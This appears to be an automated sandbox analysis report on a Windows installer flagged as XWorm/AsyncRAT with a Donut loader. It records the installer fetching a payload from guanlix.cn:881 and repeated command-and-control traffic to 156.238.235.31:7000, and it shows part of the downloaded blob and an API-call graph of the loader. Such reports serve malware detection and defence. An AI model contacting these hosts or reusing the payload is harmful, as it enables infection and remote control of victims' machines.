              Jul 2, 2024 19:23:47.670497894 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:47.676219940 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:55.662770987 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:55.711330891 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:57.445940018 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:57.453113079 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:57.765971899 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:23:57.778178930 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:23:57.783740997 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:07.539619923 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:07.544626951 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:07.941256046 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:07.950206041 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:07.955084085 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:09.602400064 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:09.607330084 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:09.617693901 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:09.623224974 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:09.633307934 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:09.638223886 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:09.648919106 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:09.653954029 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:09.696167946 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:09.701148987 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:09.923197985 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:09.930315971 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:09.935632944 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:10.140795946 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:10.146198034 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:10.151067972 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:10.361726999 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:10.363603115 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:10.369585991 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:10.369703054 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:10.374749899 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:10.374857903 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:10.379664898 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:19.789685011 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:19.794811010 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:20.104568005 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:20.106563091 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:20.111457109 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:25.670517921 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:25.711189032 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:29.883347988 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:29.888197899 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:30.205632925 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:30.207727909 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:30.212702990 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:32.274904013 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:32.279808044 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:32.590193987 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:32.592272997 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:32.597106934 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:35.133553982 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:35.138457060 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:35.449239016 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:35.451397896 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:35.459443092 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:40.883483887 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:40.888788939 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:41.198954105 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:41.201821089 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:41.207151890 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:48.166954994 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:48.171813965 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:48.483834982 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:48.488243103 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:48.493555069 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:50.558934927 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:50.563745022 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:50.909606934 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:50.911722898 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:50.916517973 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:55.688648939 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:55.742506027 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:56.525187016 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:56.532768965 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:57.054992914 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:24:57.059776068 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:24:57.064596891 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:25:04.039823055 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:25:04.044759989 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:25:04.354851961 CEST700049712156.238.235.31192.168.2.6
              Jul 2, 2024 19:25:04.355848074 CEST497127000192.168.2.6156.238.235.31
              Jul 2, 2024 19:25:04.360831022 CEST700049712156.238.235.31192.168.2.6
              TimestampSource PortDest PortSource IPDest IP
              Jul 2, 2024 19:20:59.353652954 CEST6113653192.168.2.61.1.1.1
              Jul 2, 2024 19:20:59.786377907 CEST53611361.1.1.1192.168.2.6
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jul 2, 2024 19:20:59.353652954 CEST192.168.2.61.1.1.10x74cStandard query (0)guanlix.cnA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jul 2, 2024 19:20:59.786377907 CEST1.1.1.1192.168.2.60x74cNo error (0)guanlix.cn91.208.240.157A (IP address)IN (0x0001)false
              • guanlix.cn:881
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.64971091.208.240.1578816672C:\Users\user\Desktop\31-o_Installer.exe
              TimestampBytes transferredDirectionData
              Jul 2, 2024 19:20:59.798795938 CEST93OUTGET /31.ccp HTTP/1.1
              User-Agent: Download
              Host: guanlix.cn:881
              Cache-Control: no-cache
              Jul 2, 2024 19:21:00.729688883 CEST1236INHTTP/1.1 200 OK
              Server: nginx/1.26.1
              Date: Tue, 02 Jul 2024 17:20:43 GMT
              Content-Type: application/octet-stream
              Content-Length: 71938
              Last-Modified: Mon, 01 Jul 2024 01:27:00 GMT
              Connection: keep-alive
              ETag: "668205e4-11902"
              Accept-Ranges: bytes
              Data Raw: e8 88 bb 00 00 88 bb 00 00 9e 17 7a 0f 05 b6 fa 05 be ae 6c 11 f9 d0 84 84 17 2c d2 af e5 2f 7a 81 4e 8c d6 d5 78 43 0d 21 00 00 00 00 78 5c f5 47 36 fd 4b c5 c7 38 4c f2 a6 53 12 44 94 2a 71 83 2d f1 72 bd 7a 64 fc f8 d2 d9 2e f6 36 a1 db 22 09 67 88 11 60 ea 2a 2d 53 20 7d 08 87 ef 85 6d 13 9c 56 1f 71 ef 25 87 22 28 c2 75 41 87 ee 5c 0b 3b cf 17 f8 f3 d6 20 fb 7a 13 14 9d 2d 7e 38 99 31 8d 02 08 07 51 6e e7 07 db 6b 6f 27 05 76 c7 b8 f1 54 fd fa 96 e2 47 cc 6e 86 02 63 ab 0c 48 57 16 4a ce 0d 48 3f c1 9e 74 45 12 59 0e ed 7c 9c b0 c9 4f 88 52 08 9a e5 24 38 84 43 aa 56 80 39 82 17 71 99 a3 44 56 d0 70 0c 59 ac 5b 58 af 93 b3 fe e9 a1 42 a6 de 75 f2 7a be d9 29 8f 85 06 91 7e 3b e4 8e 08 f7 d5 e9 94 44 30 de 00 52 e6 ae aa 0f 0d 96 ea 40 a9 da 44 74 9d c3 28 51 01 8e 32 2c b7 7b 47 26 ac c2 c6 c4 10 b6 38 4c 4b 79 06 f6 68 70 c7 ec bd 92 f0 22 ba 46 6e 5c b3 91 78 e2 60 9d e5 10 a2 14 1a cb e5 e1 92 f5 62 04 bc b2 36 2a 9f 3d 79 99 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
              Data Ascii: zl,/zNxC!x\G6K8LSD*q-rzd.6"g`*-S }mVq%"(uA\; z-~81Qnko'vTGncHWJH?tEY|OR$8CV9qDVpY[XBuz)~;D0R@Dt(Q2,{G&8LKyhp"Fn\x`b6*=yB]t<bfcGlK/a;{q0*RC.K\8e1.[&/$_6Y9Msc55G{#'&O8e@)meJa3kQ\KAxVp7ST$f4wzde8[COI2+3]MOEu 4MIm_'F{:^N*AgCG-;fRo,v:-DdadeN{5(4[TXE-E?KVTOFv9i&O pMl2lJdi5^J_YO\ACSB


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Target ID:0
              Start time:13:20:57
              Start date:02/07/2024
              Path:C:\Users\user\Desktop\31-o_Installer.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\31-o_Installer.exe"
              Imagebase:0x260000
              File size:249'344 bytes
              MD5 hash:5913D1B0D2FA0204E9E063467D000C3A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:false

              Reset < >

                Execution Graph

                Execution Coverage:10.3%
                Dynamic/Decrypted Code Coverage:10.4%
                Signature Coverage:2.1%
                Total number of Nodes:792
                Total number of Limit Nodes:54
                execution_graph 26465 2e6fb37 26482 2e71628 GetPEB 26465->26482 26467 2e6fb57 26468 2e71628 GetPEB 26467->26468 26469 2e6fb6b 26468->26469 26470 2e6fb84 VirtualAlloc 26469->26470 26480 2e6fcc8 26469->26480 26471 2e6fb9b 26470->26471 26470->26480 26472 2e71628 GetPEB 26471->26472 26471->26480 26473 2e6fc0d 26472->26473 26474 2e6fc2b LoadLibraryA 26473->26474 26476 2e6fc3b 26473->26476 26473->26480 26474->26474 26474->26476 26475 2e71628 GetPEB 26475->26476 26476->26475 26477 2e6fc77 26476->26477 26476->26480 26477->26480 26484 2e6ffe7 LoadLibraryA 26477->26484 26483 2e7163c 26482->26483 26483->26467 26485 2e70004 26484->26485 26486 2e6fcb5 26484->26486 26485->26486 26487 2e7002c VirtualProtect 26485->26487 26486->26480 26494 2e700cd 26486->26494 26487->26486 26488 2e70040 26487->26488 26489 2e7005a VirtualProtect 26488->26489 26490 2e70076 26489->26490 26490->26486 26491 2e7008a VirtualProtect 26490->26491 26491->26486 26492 2e7009a 26491->26492 26493 2e700af VirtualProtect 26492->26493 26493->26486 26496 2e700de 26494->26496 26495 2e700e4 26495->26480 26496->26495 26497 2e70112 VirtualProtect 26496->26497 26497->26495 26498 2e70126 26497->26498 26499 2e70140 VirtualProtect 26498->26499 26500 2e7015c 26499->26500 26500->26495 26501 2e70170 VirtualProtect 26500->26501 26501->26495 26502 2e70180 26501->26502 26503 2e70195 VirtualProtect 26502->26503 26503->26495 26504 2659d4 26554 26a9b0 26504->26554 26506 2659e0 GetStartupInfoW 26507 2659f4 HeapSetInformation 26506->26507 26509 2659ff 26506->26509 26507->26509 26555 26ac41 HeapCreate 26509->26555 26510 265a4d 26511 265a58 26510->26511 26570 2659ab 66 API calls 3 library calls 26510->26570 26571 2698e5 86 API calls 4 library calls 26511->26571 26514 265a5e 26515 265a62 26514->26515 26516 265a6a __RTC_Initialize 26514->26516 26572 2659ab 66 API calls 3 library calls 26515->26572 26556 26ae9e 73 API calls __calloc_crt 26516->26556 26518 265a69 26518->26516 26520 265a77 26521 265a83 GetCommandLineA 26520->26521 26522 265a7b 26520->26522 26557 26ce83 71 API calls 2 library calls 26521->26557 26573 26b61f 66 API calls 3 library calls 26522->26573 26526 265a93 26574 26cdc8 95 API calls 3 library calls 26526->26574 26528 265a9d 26529 265aa1 26528->26529 26530 265aa9 26528->26530 26575 26b61f 66 API calls 3 library calls 26529->26575 26558 26cb52 94 API calls 7 library calls 26530->26558 26534 265aae 26535 265ab2 26534->26535 26536 265aba 26534->26536 26576 26b61f 66 API calls 3 library calls 26535->26576 26559 26b3fe 77 API calls 4 library calls 26536->26559 26540 265ac1 26541 265ac6 26540->26541 26542 265acd 26540->26542 26577 26b61f 66 API calls 3 library calls 26541->26577 26560 26caf3 94 API calls 2 library calls 26542->26560 26546 265ad2 26547 265ad8 26546->26547 26561 262f3d 26546->26561 26547->26546 26550 265afc 26579 26b601 66 API calls _doexit 26550->26579 26553 265b01 __ftelli64 26554->26506 26555->26510 26556->26520 26557->26526 26558->26534 26559->26540 26560->26546 26580 261186 26561->26580 26570->26511 26571->26514 26572->26518 26574->26528 26578 26b5d5 66 API calls _doexit 26578->26550 26579->26553 26620 2641ba GetSystemTimeAsFileTime 26580->26620 26582 261193 26622 26434a 26582->26622 26584 26435c 66 API calls _rand 26585 261199 26584->26585 26585->26584 26586 2611de VirtualAlloc 26585->26586 26587 262e58 26586->26587 26588 262e5d __EH_prolog __write_nolock 26587->26588 26589 262e6c InternetOpenA 26588->26589 26590 262f30 VirtualFree 26589->26590 26591 262e8a InternetOpenUrlA 26589->26591 26603 26168b 26590->26603 26592 262f27 InternetCloseHandle 26591->26592 26593 262ea7 26591->26593 26592->26590 26625 262d2e 26593->26625 26595 262ebb 26596 262f0f InternetCloseHandle 26595->26596 26598 262eed InternetReadFile 26595->26598 26599 262f02 26595->26599 26635 2625c3 26595->26635 26646 262e1c 116 API calls std::ios_base::_Ios_base_dtor 26596->26646 26598->26595 26598->26599 26645 262c95 113 API calls Mailbox 26599->26645 26601 262f0d 26601->26596 26605 261690 26603->26605 26604 2616f5 26613 2611e1 GetTickCount64 Sleep GetTickCount64 26604->26613 26605->26604 26607 2616ad 26605->26607 26859 26437d 104 API calls 7 library calls 26605->26859 26609 2616c5 26607->26609 26860 26437d 104 API calls 7 library calls 26607->26860 26611 2616dd 26609->26611 26861 26437d 104 API calls 7 library calls 26609->26861 26611->26604 26862 26437d 104 API calls 7 library calls 26611->26862 26863 264424 26613->26863 26616 26122c VirtualAlloc ReadFile CloseHandle 26619 261283 26616->26619 26617 264424 99 API calls 26617->26616 26619->26550 26619->26578 26621 2641ea __aulldiv 26620->26621 26621->26582 26623 26979c __getptd 66 API calls 26622->26623 26624 264354 26623->26624 26624->26585 26626 262d33 __EH_prolog 26625->26626 26647 262813 26626->26647 26630 262d8b 26654 262483 26630->26654 26633 262dc4 26633->26595 26636 2625c8 __EH_prolog 26635->26636 26779 26221d 26636->26779 26640 2625f1 26787 261c08 67 API calls 26640->26787 26641 26266e 26788 2624f0 67 API calls __EH_prolog 26641->26788 26643 26267a 26643->26598 26645->26601 26646->26592 26648 262818 __EH_prolog 26647->26648 26667 26257a 26648->26667 26651 261fa3 26760 261ce8 26651->26760 26653 261fae 26653->26630 26656 262488 __EH_prolog 26654->26656 26655 2624db 26655->26633 26662 26153b 26655->26662 26656->26655 26775 26130b EnterCriticalSection LeaveCriticalSection std::locale::facet::_Incref 26656->26775 26658 2624c0 26776 26235f 114 API calls 8 library calls 26658->26776 26660 2624ca 26661 2610ee std::ios_base::_Ios_base_dtor 2 API calls 26660->26661 26661->26655 26663 261551 26662->26663 26664 2615bd 26662->26664 26777 26450c RaiseException 26663->26777 26778 263c86 66 API calls std::exception::_Copy_str 26663->26778 26664->26633 26676 261606 26667->26676 26672 2625b1 26674 2625bd 26672->26674 26691 2637ca EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit _Fac_tidy 26672->26691 26673 26153b 67 API calls 26673->26672 26674->26651 26677 26153b 67 API calls 26676->26677 26678 261639 26677->26678 26692 26448c 26678->26692 26681 26164c 26683 262318 26681->26683 26684 262322 __EH_prolog 26683->26684 26709 261167 26684->26709 26691->26674 26694 264496 26692->26694 26693 26729e _malloc 66 API calls 26693->26694 26694->26693 26695 261640 26694->26695 26699 2644b2 std::exception::exception 26694->26699 26705 26ac6e DecodePointer 26694->26705 26695->26681 26704 2610d4 82 API calls 3 library calls 26695->26704 26697 2644f0 26707 263d0b 66 API calls std::exception::operator= 26697->26707 26699->26697 26706 2665ba 76 API calls __cinit 26699->26706 26700 2644fa 26708 26450c RaiseException 26700->26708 26703 26450b 26704->26681 26705->26694 26706->26697 26707->26700 26708->26703 26734 26106a 26709->26734 26712 261e2e 26713 261e38 __EH_prolog 26712->26713 26714 26314c std::_Lockit::_Lockit EnterCriticalSection 26713->26714 26715 261e47 26714->26715 26749 261035 26715->26749 26717 261e5e 26718 261e71 26717->26718 26755 261b85 114 API calls 3 library calls 26717->26755 26719 263174 _Fac_tidy LeaveCriticalSection 26718->26719 26721 261ec6 26719->26721 26730 2610ee 26721->26730 26722 261e81 26723 261ea3 26722->26723 26756 263ce2 66 API calls std::exception::exception 26722->26756 26725 26106a std::locale::facet::_Incref 2 API calls 26723->26725 26727 261eb3 26725->26727 26726 261e95 26757 26450c RaiseException 26726->26757 26758 2631a0 77 API calls std::locale::_Init 26727->26758 26731 2610f4 26730->26731 26732 2610f9 26730->26732 26759 261092 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit _Fac_tidy 26731->26759 26732->26672 26732->26673 26739 26314c 26734->26739 26740 26315e 26739->26740 26741 26107b 26739->26741 26747 263b81 EnterCriticalSection 26740->26747 26743 263174 26741->26743 26744 26108f 26743->26744 26745 26317b 26743->26745 26744->26712 26748 263b91 LeaveCriticalSection 26745->26748 26747->26741 26748->26744 26750 261065 26749->26750 26751 261041 26749->26751 26750->26717 26752 26314c std::_Lockit::_Lockit EnterCriticalSection 26751->26752 26753 26104b 26752->26753 26754 263174 _Fac_tidy LeaveCriticalSection 26753->26754 26754->26750 26755->26722 26756->26726 26757->26723 26758->26718 26759->26732 26761 261cf2 __EH_prolog 26760->26761 26768 263a47 26761->26768 26764 26448c std::locale::_Init 77 API calls 26765 261d12 26764->26765 26766 261d1e Mailbox 26765->26766 26773 2610d4 82 API calls 3 library calls 26765->26773 26766->26653 26769 26448c std::locale::_Init 77 API calls 26768->26769 26770 263a53 26769->26770 26774 263b61 InitializeCriticalSection 26770->26774 26772 261d07 26772->26764 26773->26766 26774->26772 26775->26658 26776->26660 26777->26663 26778->26663 26780 262222 __EH_prolog 26779->26780 26781 262257 26780->26781 26789 261f6a 67 API calls 26780->26789 26781->26640 26783 26184b 26781->26783 26784 261907 26783->26784 26785 261864 _memmove 26783->26785 26784->26640 26785->26784 26790 26297f 26785->26790 26787->26641 26788->26643 26789->26781 26792 262984 Mailbox __EH_prolog 26790->26792 26791 262993 Mailbox 26791->26785 26792->26791 26793 2629f4 26792->26793 26794 2629e0 26792->26794 26805 26252d 77 API calls 2 library calls 26793->26805 26802 261fe5 26794->26802 26797 262aaf 26797->26791 26798 261fe5 _Fputc 99 API calls 26797->26798 26798->26791 26799 262a10 26799->26791 26799->26797 26806 26566a 99 API calls 5 library calls 26799->26806 26807 262423 77 API calls 2 library calls 26799->26807 26808 264dc5 26802->26808 26804 261ff5 26804->26791 26805->26799 26806->26799 26807->26799 26809 264dd1 __ftelli64 26808->26809 26810 264de4 26809->26810 26811 264dfc 26809->26811 26848 26a95f 66 API calls __getptd_noexit 26810->26848 26812 2650e4 __lock_file 67 API calls 26811->26812 26814 264e02 26812->26814 26817 26b0e3 __fflush_nolock 66 API calls 26814->26817 26818 264e77 26814->26818 26815 264de9 26849 26a90d 11 API calls ___strgtold12_l 26815->26849 26824 264e12 26817->26824 26822 264e85 26818->26822 26827 26b109 26818->26827 26821 264df4 __ftelli64 26821->26804 26852 264eb9 LeaveCriticalSection LeaveCriticalSection _fputc 26822->26852 26824->26818 26850 26a95f 66 API calls __getptd_noexit 26824->26850 26825 264e6c 26851 26a90d 11 API calls ___strgtold12_l 26825->26851 26828 26b0e3 __fflush_nolock 66 API calls 26827->26828 26829 26b119 26828->26829 26830 26b124 26829->26830 26831 26b13b 26829->26831 26856 26a95f 66 API calls __getptd_noexit 26830->26856 26833 26b13f 26831->26833 26840 26b14c _wprintf 26831->26840 26857 26a95f 66 API calls __getptd_noexit 26833->26857 26835 26b1ad 26836 26b23c 26835->26836 26837 26b1bc 26835->26837 26838 26bee7 __write 97 API calls 26836->26838 26839 26b1d3 26837->26839 26844 26b1f0 26837->26844 26842 26b129 26838->26842 26841 26bee7 __write 97 API calls 26839->26841 26840->26835 26840->26842 26843 2723d6 __write_nolock 66 API calls 26840->26843 26845 26b1a2 26840->26845 26841->26842 26842->26822 26843->26845 26844->26842 26858 26c501 71 API calls 6 library calls 26844->26858 26845->26835 26853 26b26d 26845->26853 26848->26815 26849->26821 26850->26825 26851->26818 26852->26821 26854 2663b8 __malloc_crt 66 API calls 26853->26854 26855 26b282 26854->26855 26855->26835 26856->26842 26857->26842 26858->26842 26859->26605 26860->26607 26861->26609 26862->26611 26866 26ac24 26863->26866 26869 26ab9f 26866->26869 26868 261216 26868->26616 26868->26617 26870 26abab __ftelli64 _wprintf 26869->26870 26871 26abd7 26870->26871 26872 26abc2 26870->26872 26874 2650e4 __lock_file 67 API calls 26871->26874 26884 26a95f 66 API calls __getptd_noexit 26872->26884 26876 26abdd 26874->26876 26875 26abc7 26885 26a90d 11 API calls ___strgtold12_l 26875->26885 26886 269a60 66 API calls 4 library calls 26876->26886 26879 26abe8 26887 269afc 97 API calls __flush 26879->26887 26881 26abd2 __ftelli64 26881->26868 26882 26ac01 26888 26ac1c LeaveCriticalSection LeaveCriticalSection _fputc 26882->26888 26884->26875 26885->26881 26886->26879 26887->26882 26888->26881 26889 53314e0 26890 53314e4 26889->26890 26894 5331941 26890->26894 26899 53317c7 26890->26899 26904 53318e0 26890->26904 26895 53318b7 26894->26895 26896 53318de 26895->26896 26909 5331970 26895->26909 26913 533195f 26895->26913 26896->26890 26901 5331804 26899->26901 26900 53318de 26900->26890 26901->26900 26902 5331970 GlobalMemoryStatusEx 26901->26902 26903 533195f GlobalMemoryStatusEx 26901->26903 26902->26901 26903->26901 26905 53318b7 26904->26905 26906 53318de 26905->26906 26907 5331970 GlobalMemoryStatusEx 26905->26907 26908 533195f GlobalMemoryStatusEx 26905->26908 26906->26890 26907->26905 26908->26905 26910 5331995 26909->26910 26917 5332563 26910->26917 26911 5331a76 26911->26911 26914 5331995 26913->26914 26916 5332563 GlobalMemoryStatusEx 26914->26916 26915 5331a76 26915->26915 26916->26915 26918 5332584 26917->26918 26919 53324f4 26917->26919 26918->26919 26923 53371e8 26918->26923 26927 53371d8 26918->26927 26919->26911 26920 533285a 26920->26911 26924 533720d 26923->26924 26932 5337477 26924->26932 26925 533726f 26925->26920 26928 53371e6 26927->26928 26929 5337167 26927->26929 26931 5337477 GlobalMemoryStatusEx 26928->26931 26929->26920 26930 533726f 26930->26920 26931->26930 26936 53378c0 26932->26936 26941 5337878 26932->26941 26933 5337496 26933->26925 26937 53378f5 26936->26937 26938 53378cd 26936->26938 26946 53374b0 26937->26946 26938->26933 26942 533787d 26941->26942 26943 53378cd 26942->26943 26944 53374b0 GlobalMemoryStatusEx 26942->26944 26943->26933 26945 5337912 26944->26945 26945->26933 26947 5337998 GlobalMemoryStatusEx 26946->26947 26949 5337912 26947->26949 26949->26933 25854 262c4c 25855 262c5a 25854->25855 25857 262c6d Mailbox 25854->25857 25860 262875 25855->25860 25858 262c5f 25867 265902 25858->25867 25862 26287f __EH_prolog 25860->25862 25861 2628a6 Mailbox 25861->25858 25862->25861 25880 26252d 77 API calls 2 library calls 25862->25880 25865 2628c5 25865->25861 25881 26566a 99 API calls 5 library calls 25865->25881 25882 262423 77 API calls 2 library calls 25865->25882 25868 26590e __ftelli64 25867->25868 25869 265935 25868->25869 25870 265920 25868->25870 25877 265930 __ftelli64 25869->25877 25883 2650e4 25869->25883 25905 26a95f 66 API calls __getptd_noexit 25870->25905 25873 265925 25906 26a90d 11 API calls ___strgtold12_l 25873->25906 25877->25857 25880->25865 25881->25865 25882->25865 25884 2650f6 25883->25884 25885 265118 EnterCriticalSection 25883->25885 25884->25885 25886 2650fe 25884->25886 25888 26510e 25885->25888 25908 26b7b7 25886->25908 25889 265895 25888->25889 25890 2658a6 25889->25890 25891 2658ba 25889->25891 25988 26a95f 66 API calls __getptd_noexit 25890->25988 25892 2658b6 25891->25892 25982 2651c2 25891->25982 25907 26596e LeaveCriticalSection LeaveCriticalSection _fputc 25892->25907 25895 2658ab 25989 26a90d 11 API calls ___strgtold12_l 25895->25989 25899 2658ce 25991 26b0e3 25899->25991 25901 2658d4 25998 26c687 72 API calls 6 library calls 25901->25998 25903 2658da 25903->25892 25999 264452 66 API calls 2 library calls 25903->25999 25905->25873 25906->25877 25907->25877 25909 26b7df EnterCriticalSection 25908->25909 25910 26b7cc 25908->25910 25909->25888 25915 26b6f5 25910->25915 25912 26b7d2 25912->25909 25942 26b61f 66 API calls 3 library calls 25912->25942 25916 26b701 __ftelli64 25915->25916 25917 26b711 25916->25917 25918 26b729 25916->25918 25943 26c970 66 API calls 2 library calls 25917->25943 25924 26b737 __ftelli64 25918->25924 25946 2663b8 25918->25946 25920 26b716 25944 26c7c1 66 API calls 7 library calls 25920->25944 25924->25912 25925 26b71d 25945 26b37d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 25925->25945 25926 26b758 25930 26b7b7 __lock 65 API calls 25926->25930 25927 26b749 25952 26a95f 66 API calls __getptd_noexit 25927->25952 25931 26b75f 25930->25931 25933 26b767 InitializeCriticalSectionAndSpinCount 25931->25933 25934 26b792 25931->25934 25935 26b777 25933->25935 25936 26b783 25933->25936 25955 264452 66 API calls 2 library calls 25934->25955 25953 264452 66 API calls 2 library calls 25935->25953 25956 26b7ae LeaveCriticalSection _doexit 25936->25956 25939 26b77d 25954 26a95f 66 API calls __getptd_noexit 25939->25954 25943->25920 25944->25925 25949 2663c1 25946->25949 25948 2663f7 25948->25926 25948->25927 25949->25948 25950 2663d8 Sleep 25949->25950 25957 26729e 25949->25957 25951 2663ed 25950->25951 25951->25948 25951->25949 25952->25924 25953->25939 25954->25936 25955->25936 25956->25924 25958 26731b 25957->25958 25967 2672ac 25957->25967 25980 26ac6e DecodePointer 25958->25980 25960 267321 25981 26a95f 66 API calls __getptd_noexit 25960->25981 25963 2672da RtlAllocateHeap 25964 267313 25963->25964 25963->25967 25964->25949 25966 267307 25978 26a95f 66 API calls __getptd_noexit 25966->25978 25967->25963 25967->25966 25968 2672b7 25967->25968 25972 267305 25967->25972 25977 26ac6e DecodePointer 25967->25977 25968->25967 25974 26c970 66 API calls 2 library calls 25968->25974 25975 26c7c1 66 API calls 7 library calls 25968->25975 25976 26b37d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 25968->25976 25979 26a95f 66 API calls __getptd_noexit 25972->25979 25974->25968 25975->25968 25977->25967 25978->25972 25979->25964 25980->25960 25981->25964 25983 2651db 25982->25983 25987 2651fd 25982->25987 25984 26b0e3 __fflush_nolock 66 API calls 25983->25984 25983->25987 25985 2651f6 25984->25985 26000 26bee7 25985->26000 25990 26c094 66 API calls _free 25987->25990 25988->25895 25989->25892 25990->25899 25992 26b104 25991->25992 25993 26b0ef 25991->25993 25992->25901 26171 26a95f 